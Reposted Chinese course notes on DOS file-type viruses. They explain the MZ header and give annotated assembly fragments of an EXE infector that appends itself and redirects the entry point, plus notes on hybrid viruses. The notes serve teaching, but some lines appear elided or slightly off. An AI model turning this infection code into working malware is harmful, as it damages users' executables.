其他分享
首页 > 其他分享> > 【计算机网络病毒六】DOS病毒之文件型病毒

【计算机网络病毒六】DOS病毒之文件型病毒

作者:互联网

四、DOS病毒之文件型病毒

4.4 文件型病毒

基本原理
image-20210616144936588
感染MZ文件

MZ文件结构及其加载

00-01  e_magic; // 文件类型标记:0x4D5A魔术数字
02-03  e_cblp; // 文件最后页的字节数
04-05  e_cp; // 文件页数
06-07  e_crlc; // 重定义项个数
08-09  e_cparhdr; // 头部尺寸,以16B的段落为单位
0a-0b  e_minalloc; // 所需的最小内存段
0c-0d  e_maxalloc; // 所需的最大内存段 
0e-0f  e_ss; // 初始的SS值(相对偏移量)
10-11 e_sp; // 初始的SP值
12-13 e_csum; // 校验和
14-15 e_ip; // 初始的IP值
16-17 e_cs; // 初始的CS值(相对偏移量)
18-19 e_lfarlc; // 重定位表偏移地址
1a-1b e_ovno; // 覆盖号

重定位表
载入模块....
  1. 申请内存后,把载入模块读入内存指定区域
  2. DS、ES指向程度段前缀PSP
  3. CS、IP、SS、SP由文件头的格式化区域确定并通过重定位进行调整
  4. EXE文件加载之后,从CS:IP开始执行。
  5. 病毒一般将自己加在文件的末端,并修改CS、IP的值指向病毒起始地址,修改文件长度和SS、SP
MZ文件病毒样例分析
设置DTA
mov  ah, 1ah
mov  dx, offset  own_dta-Virus_Start
add  dx,  si
int     21
查找EXE文件
mov  ah, 4eh
mov  dx, offset file_match-Virus_Start
add  dx,  si
int     21
jnc   count2
打开感染文件
mov  ah, 3d02h
mov   dx,   Own_dta-Virus_Start+1eh//文件名
add    dx,  si
int      21
jnc   count1
读感染文件头
mov  ah, 3fh
mov  cx, 1ch
mov   dx,   offset  Exe_Header-Virus_Start
add    dx,  si
int      21
jnc   count1
判读是否感染
   cmp  byte ptr ds:[si+Exe_Header-Virus_Start], ‘M’
	jnz    no_exe
	cmp  word ptr ds:[si+Exe_Header-Virus_Start+12], ‘FB’
    jz       infected
移动文件指针至文件尾
	mov  ax,  4202h
	xor    cx,  cx
	xor    dx,  dx
	int     21
    push  dx  //宿主程序尾,也是病毒体的开始
    push  ax  //将以此为感染后EXE文件的入口
写病毒体至文件尾
	mov  ax,  40h
	mov  cx,  Virus_Length  //病毒体长度
	mov  dx,  si  //病毒开始位置
	int     21
获取感染后新文件的长度
	mov  ax,  4202h
	xor    cx,  cx
	xor    dx,  dx
	int     21
    mov  cx,  200//512 一页
    div    cx
    inc    ax 
改写感染后文件头中文件长度信息
	mov  word ptr ds:[si+Exe_Header-Virus_Start+2], dx
    //文件最后一页的字节数
	mov  word ptr ds:[si+Exe_Header-Virus_Start+4], ax
    //文件总页数
修改感染文件入口至病毒代码处
	pop  ax
    pop  dx
	mov cx, 10
    div   cx
    sub  ax, word ptr ds:[si+Exe_Header-Virus_Start+8]
    //文件头大小 
	mov  word ptr ds:[si+Exe_Header-Virus_Start+16], ax
    //CS
	mov  word ptr ds:[si+Exe_Header-Virus_Start+14], dx
    //IP
写修改后的文件头至感染文件
	mov  ax,  4200h
	xor    cx,  cx
	xor    dx,  dx
	int     21
	mov  ah, 40
	mov  cx, 1ch
	mov  dx,  offset Exe_header-Virus_Start
    add   dx,  si
    int     21
病毒发作
	pop   dx     //指向PSP的DS
   add   dx,  offset  sz_message-Virus_Start
	mov  ah, 09h
	int     21
返回宿主程序入口
	mov  ax, es
	add   ax, 10
	add   ax, cs:[si+Exe_header-Virus_Start+16]
	push  ax  //宿主CS
	push   cs:[si+Exe_header-Virus_Start+14]//宿主IP
    push   ds
    ....	
	pop     ds
	retf

4.5 混合型病毒的基本原理

概念

基本原理

  1. 文件中的病毒执行时将病毒写入引导区
  2. 染毒盘启动系统时,用引导型病毒的方法驻留内存,但此时DOS未加载,无法修改INT 21H,无法感染文件。
  3. 通常的做法是修改INT 8H,用INT 8H服务程序监测INT 21H的地址是否修改,如果修改,说明DOS已加载,则可修改INT 21H指向病毒传染段。

标签:文件,mov,计算机网络,Start,Virus,dx,si,DOS,病毒
来源: https://www.cnblogs.com/cxgang/p/15210741.html